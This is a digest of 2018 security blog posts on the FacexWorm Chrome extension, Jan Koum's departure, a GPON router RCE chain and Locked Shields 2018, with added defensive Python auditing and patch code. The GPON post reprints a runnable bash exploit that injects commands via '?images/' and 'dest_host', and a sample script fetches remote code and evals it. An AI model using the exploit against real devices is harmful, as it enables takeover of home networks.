


FacexWorm targets cryptocurrency users and spreads through Facebook Messenger

Posted: 01 May 2018 11:18 AM PDT

Social networks can be a privileged attack vector for rapidly spreading malware to a huge audience. FacexWorm targets cryptocurrency users by spreading through Facebook Messenger.

A new threat is spreading by leveraging an apparently harmless link to a video, sent by a friend over Facebook Messenger.

Security researchers from Trend Micro have spotted a malicious Chrome extension, dubbed FacexWorm, which is spreading through Facebook Messenger and targeting users of cryptocurrency trading platforms to steal their accounts' credentials and run cryptocurrency mining scripts.

“Our Cyber Safety Solutions team identified a malicious Chrome extension we named FacexWorm, which uses a miscellany of techniques to target cryptocurrency trading platforms accessed on an affected browser and propagates via Facebook Messenger.” reads the report published by Trend Micro.

According to the experts, FacexWorm was first detected in late April and appears to be linked to two other Facebook Messenger spam campaigns, one that occurred in August 2017 and a second one that was launched in December 2017 to spread the Digmine cryptocurrency miner.

Experts recently observed a spike in FacexWorm activity; the malicious code was detected in several countries, including Germany, Tunisia, Japan, Taiwan, South Korea, and Spain.

FacexWorm implements several features, including stealing account credentials from websites, like Google and cryptocurrency sites, redirecting victims to rogue cryptocurrency sites, injecting cryptocurrency miners, and redirecting victims to the attacker’s referral link for cryptocurrency-related referral programs.

The following image shows the FacexWorm's infection chain:


FacexWorm propagates by sending links over Facebook Messenger to the friends of an affected Facebook account. The links redirect users to fake versions of popular video streaming websites, including YouTube, where they are encouraged to install a malicious Chrome extension posing as a codec needed to continue playing the video, and to grant every permission it requests to complete the installation. With this trick the malware gains the ability to read and change data on any website the user visits.

Currently the malicious extension targets only Chrome users; when it detects a different browser it redirects the user to an innocuous-looking advertisement.

“FacexWorm is delivered through socially engineered links sent to Facebook Messenger. The links redirect to a fake YouTube page that will ask unwitting users to agree and install a codec extension (FacexWorm) in order to play the video on the page. It will then request privilege to access and change data on the opened website.” continues the report.


Once the FacexWorm Chrome extension is installed in the victim's browser, it downloads further modules from its command and control (C&C) server to perform other malicious activities.

“FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine. It downloads additional JavaScript code from the C&C server when the browser is opened,” continues the report.

“Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage.”
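As an added example (not code from the Trend Micro report and not the FacexWorm sample itself), the following Python script audits an unpacked Chrome extension directory for the two traits described above: permissions that reach every site the user visits, and a background script that fetches JavaScript from a remote host (the report mentions GitHub-hosted code) and executes it. The sample manifest and background script it writes are constructed for the demonstration, and the GitHub URL in them is a placeholder.

```python
"""Audit an unpacked Chrome extension for the traits the FacexWorm report
describes: permissions reaching every site the user visits and background
code that fetches JavaScript from a remote host and executes it.
Added example with a constructed sample; none of it is FacexWorm's own code."""
import json
import os
import re
import tempfile

# Manifest v2 host patterns that grant access to every origin.
BROAD_HOSTS = {"<all_urls>", "*://*/*", "http://*/*", "https://*/*"}
# APIs that let an extension watch or rewrite traffic and sessions.
HIGH_RISK_PERMS = {"tabs", "webRequest", "webRequestBlocking", "cookies", "webNavigation"}
# Source-level indicators of "download code, then run it".
REMOTE_CODE_PATTERNS = [
    ("remote fetch", re.compile(r"\b(?:fetch|XMLHttpRequest|importScripts)\s*\(")),
    ("dynamic eval", re.compile(r"\b(?:eval|Function)\s*\(")),
    ("script injection", re.compile(r"executeScript\s*\(|createElement\(\s*['\"]script['\"]\s*\)")),
    ("github raw host", re.compile(r"raw\.githubusercontent\.com", re.I)),
]


def audit_manifest(manifest: dict) -> list:
    """Return findings about over-broad permissions in a manifest dict."""
    findings = []
    perms = set(manifest.get("permissions", []))
    broad = perms & BROAD_HOSTS
    if broad:
        findings.append("host permission covers all sites: " + ", ".join(sorted(broad)))
    for cs in manifest.get("content_scripts", []):
        if set(cs.get("matches", [])) & BROAD_HOSTS:
            findings.append("content script runs on every page: " + ", ".join(cs.get("js", [])))
    risky = perms & HIGH_RISK_PERMS
    if risky:
        findings.append("high-risk API permissions: " + ", ".join(sorted(risky)))
    return findings


def scan_script(source: str) -> list:
    """Return the names of the remote-code indicators present in a script."""
    return [name for name, rx in REMOTE_CODE_PATTERNS if rx.search(source)]


def audit_extension(ext_dir: str) -> dict:
    """Audit manifest.json and every background/content script it references."""
    with open(os.path.join(ext_dir, "manifest.json"), encoding="utf-8") as fh:
        manifest = json.load(fh)
    scripts = list(manifest.get("background", {}).get("scripts", []))
    for cs in manifest.get("content_scripts", []):
        scripts.extend(cs.get("js", []))
    per_script = {}
    for rel in scripts:
        path = os.path.join(ext_dir, rel)
        if os.path.isfile(path):
            with open(path, encoding="utf-8") as fh:
                hits = scan_script(fh.read())
            if hits:
                per_script[rel] = hits
    # Loader pattern: something is fetched AND there is a way to execute it.
    loader = any("remote fetch" in h and {"dynamic eval", "script injection"} & set(h)
                 for h in per_script.values())
    return {"manifest": audit_manifest(manifest), "scripts": per_script,
            "remote_code_loader": loader}


# Constructed sample "codec" extension mimicking the behaviour described above.
SAMPLE_MANIFEST = {
    "manifest_version": 2, "name": "Video Codec Helper", "version": "1.0",
    "permissions": ["<all_urls>", "tabs", "webRequest", "webRequestBlocking", "storage"],
    "background": {"scripts": ["bg.js"]},
    "content_scripts": [{"matches": ["<all_urls>"], "js": ["inject.js"]}],
}
SAMPLE_BG_JS = """
// constructed sample, not FacexWorm's code; the URL is a placeholder
chrome.runtime.onStartup.addListener(function () {
  fetch("https://raw.githubusercontent.com/example/repo/master/stage2.js")
    .then(function (r) { return r.text(); })
    .then(function (code) { eval(code); });
});
chrome.tabs.onUpdated.addListener(function (tabId, info) {
  if (info.status === "complete") { chrome.tabs.executeScript(tabId, { file: "inject.js" }); }
});
"""


def build_sample_extension() -> str:
    """Write the constructed sample to a temporary directory; return its path."""
    ext_dir = tempfile.mkdtemp(prefix="ext_audit_demo_")
    with open(os.path.join(ext_dir, "manifest.json"), "w", encoding="utf-8") as fh:
        json.dump(SAMPLE_MANIFEST, fh)
    with open(os.path.join(ext_dir, "bg.js"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_BG_JS)
    return ext_dir


if __name__ == "__main__":
    report = audit_extension(build_sample_extension())
    for line in report["manifest"]:
        print("manifest:", line)
    for name, hits in report["scripts"].items():
        print(f"{name}: {', '.join(hits)}")
    print("remote code loader:", report["remote_code_loader"])
```

Point audit_extension() at a real unpacked extension under a Chrome profile's Extensions directory to get the same report. The permission rules are written for manifest v2, which was current in 2018; for manifest v3 extensions the host patterns live under host_permissions and would need to be checked there too.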

Trend Micro detailed the malicious behaviors of the malware, which include:

  • Steal the user's account credentials for Google, MyMonero, and Coinhive.
  • Push a cryptocurrency scam. 
  • Conduct malicious web cryptocurrency mining.
  • Hijack cryptocurrency-related transactions.
  • Earn from cryptocurrency-related referral programs.

Pierluigi Paganini

(Security Affairs – cryptocurrency malware, Facebook)

The post FacexWorm targets cryptocurrency users and spreads through Facebook Messenger appeared first on Security Affairs.

WhatsApp co-founder Jan Koum to leave Facebook amid privacy concerns

Posted: 01 May 2018 02:16 AM PDT

Jan Koum, co-founder of WhatsApp, reportedly plans to leave the company in the wake of growing concerns about Facebook's approach to users' privacy.

"It is time for me to move on . . . I'm taking some time off to do things I enjoy outside of technology, such as collecting rare air-cooled Porsches, working on my cars and playing ultimate frisbee," WhatsApp  co-founder, CEO and Facebook board member Jan Koum wrote in a Facebook post. 

Koum, who sold WhatsApp to Facebook for more than $19 billion in 2014, plans to leave Facebook's board of directors as well.

Koum did not provide further details on his decision or a timeline for his departure.

Jan Koum to leave Facebook

According to The Washington Post, this is one of the effects of the Cambridge Analytica case: Koum clearly disagreed with the way Facebook managed users' data.

“The billionaire chief executive of WhatsApp, Jan Koum, is planning to leave the company after clashing with its parent, Facebook, over the popular messaging service's strategy and Facebook's attempts to use its personal data and weaken its encryption, according to people familiar with internal discussions.” reported The Washington Post.

“The independence and protection of its users' data is a core tenet of WhatsApp that Koum and his co-founder, Brian Acton, promised to preserve when they sold their tiny start-up to Facebook. It doubled down on its pledge by adding encryption in 2016. The clash over data took on additional significance in the wake of revelations in March that Facebook had allowed third parties to mishandle its users' personal information.”

Facebook CEO Mark Zuckerberg replied to Koum's decision by crediting him with teaching him "about encryption and its ability to take power from centralized systems and put it back in people's hands. Those values will always be at the heart of WhatsApp."

According to The Washington Post, Koum was also disappointed by Facebook executives' approach to the end-to-end encryption WhatsApp has offered since 2016, including the possibility of weakening it to facilitate law enforcement investigations and the business use of the app through the WhatsApp For Business program.

According to The Washington Post, other WhatsApp employees are also unhappy with the situation at the company and plan to leave in November, four years and a month after the Facebook acquisition, when they will be allowed to exercise all of their stock options under the terms of the deal.

Pierluigi Paganini

(Security Affairs – Jan Koum, WhatsApp)

The post WhatsApp co-founder Jan Koum to leave Facebook amid privacy concerns appeared first on Security Affairs.

Critical RCE vulnerability found in over a million GPON Home Routers

Posted: 01 May 2018 12:52 AM PDT

Security researchers at VPNMentor conducted a comprehensive assessment of a number of GPON home routers and discovered a critical remote code execution vulnerability that could be exploited to gain full control over them.

The researchers have found a way to bypass the authentication to access the GPON home routers (CVE-2018-10561). The experts chained this authentication bypass flaw with another command injection vulnerability (CVE-2018-10562) and were able to execute commands on the device.

GPON Home Routers hack


Analyzing the firmware of the GPON home routers, the experts found two different critical vulnerabilities (CVE-2018-10561 and CVE-2018-10562) that can be chained to gain complete control of the vulnerable device, and therefore of the network behind it. The first vulnerability lies in the authentication mechanism of the device and allows an attacker to bypass authentication entirely.

The flaw affects the built-in HTTP server, which decides whether a request needs authentication by checking for specific paths in the requested URL. The check apparently matches the string anywhere in the request URL, query string included, so an attacker can bypass authentication on any endpoint with a simple trick: appending

?images/

to the URL. This works on both the HTML pages and the GponForm/ endpoints.

For instance, by inserting


the experts were able to control the GPON Home Routers.

While looking through the device functionalities, the experts noticed the diagnostic endpoint contained the ping and traceroute commands. It didn't take much to figure out that the commands can be injected using the host parameter.

“Since the router saves ping results in /tmp and transmits it to the user when the user revisits /diag.html, it's quite simple to execute commands and retrieve their output with the authentication bypass vulnerability.” reads the analysis published by VPNMentor.
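To make the two bugs concrete, here is an added Python reconstruction (not VPNMentor's code and not the router firmware): an authentication check that treats any request whose URL contains images/ as a public static asset, which is the assumed logic behind the ?images/ bypass, and a diagnostic handler that pastes dest_host into a shell command, each next to a hardened version. The static-asset prefixes, the /tmp file name and the exact vulnerable logic are assumptions chosen to reproduce the behaviour the researchers describe.

```python
"""Reconstruction of the GPON authentication bypass and ping command injection.
Added example: the vulnerable variants are assumptions that reproduce the
behaviour described by VPNMentor, not the real firmware code."""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Assumed static-asset allowlist that the firmware serves without a session.
PUBLIC_PREFIXES = ("/images/", "/css/", "/js/")


def is_public_vulnerable(raw_uri: str) -> bool:
    """Assumed firmware logic: substring match on the whole request target,
    so '?images/' in the query string makes any endpoint look like an asset."""
    return "images/" in raw_uri


def is_public_fixed(raw_uri: str) -> bool:
    """Match only the normalized path component; the query string is ignored."""
    path = unquote(urlsplit(raw_uri).path)
    segments = []
    for seg in path.split("/"):          # collapse '.' and '..' so traversal
        if seg == "..":                  # such as /images/../diag.html fails
            if segments:
                segments.pop()
        elif seg and seg != ".":
            segments.append(seg)
    norm = "/" + "/".join(segments)
    return any(norm.startswith(p) for p in PUBLIC_PREFIXES)


def authorize(raw_uri: str, has_session: bool, is_public) -> bool:
    """Router-side decision: allow if logged in or if the resource is public."""
    return has_session or is_public(raw_uri)


# RFC 1123 hostname: labels of letters, digits and hyphens, no metacharacters.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$")


def build_ping_vulnerable(dest_host: str) -> str:
    """Assumed firmware logic: the parameter is pasted into a shell line."""
    return f"ping -c 4 {dest_host} > /tmp/ping_result"


def validate_host(dest_host: str) -> str:
    """Accept an IP literal or a hostname; reject everything else."""
    try:
        return str(ipaddress.ip_address(dest_host))
    except ValueError:
        pass
    if HOSTNAME_RE.match(dest_host):
        return dest_host
    raise ValueError(f"dest_host rejected: {dest_host!r}")


def build_ping_fixed(dest_host: str) -> list:
    """argv list for subprocess.run(..., shell=False): no shell ever sees it."""
    return ["ping", "-c", "4", validate_host(dest_host)]


if __name__ == "__main__":
    for uri in ("/diag.html", "/diag.html?images/", "/GponForm/diag_Form?images/",
                "/images/logo.png", "/images/../diag.html"):
        print(f"{uri:32} vulnerable={authorize(uri, False, is_public_vulnerable)!s:5} "
              f"fixed={authorize(uri, False, is_public_fixed)}")
    payload = "`id`;id"                     # the shape the bash exploit sends
    print("vulnerable command line:", build_ping_vulnerable(payload))
    try:
        build_ping_fixed(payload)
    except ValueError as exc:
        print("fixed handler:", exc)
    print("fixed handler argv:", build_ping_fixed("192.168.1.1"))
```

The two fixes are independent: parsing the path before the allowlist check closes the bypass even if the command injection remains, and validating dest_host and passing it as an argv element (never through a shell) closes the injection even for an authenticated user.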

The experts included the following bash version of the exploit code. “We send the commands with two modes backtick (`) and semicolon (;) because different models trigger on different devices” continues the post. The fragment is reproduced here as a complete script, with a usage check and comments added so it runs as-is:

#!/bin/bash
# Usage: ./gpon.sh http://<router-ip> "<command>"
# $1 = base URL of the target, $2 = shell command to run on the device
[ $# -eq 2 ] || { echo "usage: $0 <url> <command>"; exit 1; }

echo "[+] Sending the Command... "
# The "?images/" suffix triggers the authentication bypass (CVE-2018-10561).
# The command is injected through dest_host twice, in backtick and semicolon
# form, because different models trigger on different ones (CVE-2018-10562).
curl -k -d "XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=\`$2\`;$2&ipv=0" $1/GponForm/diag_Form?images/ 2>/dev/null 1>/dev/null
echo "[+] Waiting...."
sleep 3
echo "[+] Retrieving the output...."
# /diag.html (again with the bypass suffix) returns the saved ping result,
# which now contains the output of the injected command.
curl -k $1/diag.html?images/ 2>/dev/null | grep 'diag_result = ' | sed -e 's/\\n/\n/g'

GPON (Gigabit-capable Passive Optical Network) is a very widespread fiber-optic access technology, and the affected home routers are typically supplied to customers by ISPs. In the video, the researchers show that over one million of these routers are in use.

Below a video PoC published by the researchers:

“We tested this vulnerability on many random GPON routers, and the vulnerability was found on all of them. Because so many people use these types of routers, this vulnerability can result in an entire network compromise.” concluded the experts.


The researchers' advice to users:

  1. Check whether your router uses the GPON network.
  2. Be aware that GPON routers can be hacked and exploited.
  3. Talk to your ISP to see what they can do to fix the bug.
  4. Warn your friends on Facebook and Twitter.

Pierluigi Paganini

(Security Affairs – GPON Home Routers, hacking)

The post Critical RCE vulnerability found in over a million GPON Home Routers appeared first on Security Affairs.

The NATO team is the winner of the cyber defence exercise Locked Shields 2018

Posted: 30 Apr 2018 11:54 PM PDT

The NATO team is the winner of the Cyber Defence Exercise Locked Shields 2018 that took place on April 23-26 in Tallinn, Estonia.

The international live-fire cyber defence exercise Locked Shields 2018 took place on April 23-26 in Tallinn, Estonia, and the figures behind this important competition are impressive.

A total of 22 Blue Teams participated in the Locked Shields 2018 exercise, and more than 1,000 experts from nearly 30 countries tested their cyber capabilities.

This year the winner was the team from NATO, composed of 30 cyber experts, followed by France and the Czech Republic.

“The winning team excelled in all categories of the exercise. It was the first time NATO participated with a team representing different NATO agencies," said Aare Reintam, Project Manager of Technical Exercises at CCDCOE.

The NATO Cooperative Cyber Defence Centre of Excellence (CCDCOE) has organized Locked Shields every year since 2010; the exercise aims to test the ability of the teams to respond to a major cyber attack.

The scenario sees a fictional country named Berylia targeted by massive and coordinated cyber attacks against its critical infrastructure, including an Internet service provider, power grids, a military airbase and telecommunication networks.

Locked Shields 2018 involved 4,000 virtualized systems and over 2,500 attacks that hit the target altogether.

The Blue Teams were tasked to preserve the operations of more than 150 complex IT systems per team, reporting incidents, executing strategic decisions and solving forensic, legal and media challenges.

"However, every single participating team deserves credit for handling the complex cyber challenges of Locked Shields. The exercise involved around 4000 virtualised systems and more than 2500 attacks altogether.” added Reintam. “In addition to keeping up more than 150 complex IT systems per team, the Blue Teams had to be efficient in reporting incidents, executing strategic decisions and solving forensic, legal and media challenges. Protection of critical infrastructure is essential for ensuring the efficient operation of both military and civilian organisations, it is the foundation of our modern digital lifestyle," 

Locked Shields 2018

More photos of Locked Shields 2018 (credits to CCDCOE, photographer Arno Mikkor)

Once again, the exercise highlighted the importance of information sharing when dealing with cyber threats, and of having the authority to make decisions and give guidance while carefully evaluating the potential legal implications.

“In 2018 the exercise highlighted the growing need to enhance dialogue between technical experts, civil and military participants and decision-making levels.” reads the press release published by the CCDCOE.

“CCDCOE integrates the technical and strategic game, enabling participating nations to practice the entire chain of command in the event of a severe cyber incident involving both civilian and military players.”

Cyber drills like Locked Shields 2018 are important occasions for testing cyber defense abilities and the processes in place to mitigate massive attacks against critical infrastructure.

Pierluigi Paganini

(Security Affairs – Locked Shields 2018, hacking)

The post The NATO team is the winner of the cyber defence exercise Locked Shields 2018 appeared first on Security Affairs.